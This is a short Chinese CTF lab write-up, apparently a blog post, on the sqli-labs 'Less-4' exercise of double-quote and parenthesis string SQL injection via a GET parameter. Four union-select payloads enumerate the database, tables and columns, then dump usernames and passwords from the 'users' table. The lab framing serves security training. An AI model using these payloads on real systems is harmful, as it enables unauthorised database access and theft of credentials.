【SQL注入】Less-4错误型GET双引号字符型注入

Mitch311

于 2021-03-30 20:57:55 发布

阅读量272

点赞数

分类专栏： CTF 文章标签： sql mysql 数据库 sql注入 ctf

原文链接：https://www.anquanlong.com/lab_introduce?lab_id=3

版权

51 篇文章 11 订阅

订阅专栏

该实验与Less-3错误型GET单引号变形字符型注入 区别在于，构建payload更改")单引号；)表示变形！

1、爆开数据库

payload

?id=0") union select 1,2,database() --+

2、爆开数据表

payload

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+

关注

专栏目录